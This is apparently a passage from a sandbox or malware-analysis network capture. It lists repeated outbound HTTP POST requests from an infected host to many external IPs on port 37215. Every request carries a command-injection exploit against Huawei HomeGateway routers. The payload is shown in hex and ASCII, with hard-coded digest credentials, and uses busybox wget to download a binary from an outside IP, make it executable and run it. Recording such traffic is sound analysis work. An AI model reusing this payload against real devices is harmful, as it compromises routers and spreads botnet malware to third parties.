                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              534192.168.2.1543456197.209.113.22637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.720993996 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              535192.168.2.1542898197.185.173.15437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.721021891 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              536192.168.2.1543854181.177.75.4037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.721046925 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              537192.168.2.1549634157.181.179.4237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.721046925 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              538192.168.2.1533796156.105.138.10837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.721064091 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              539192.168.2.1532934138.57.152.11137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.721077919 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              540192.168.2.1540220186.31.194.2237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.721100092 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              541192.168.2.1553900156.16.37.5837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.721122026 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              542192.168.2.1548222121.43.44.4237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.721137047 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              543192.168.2.1546916186.26.176.5837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.721152067 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
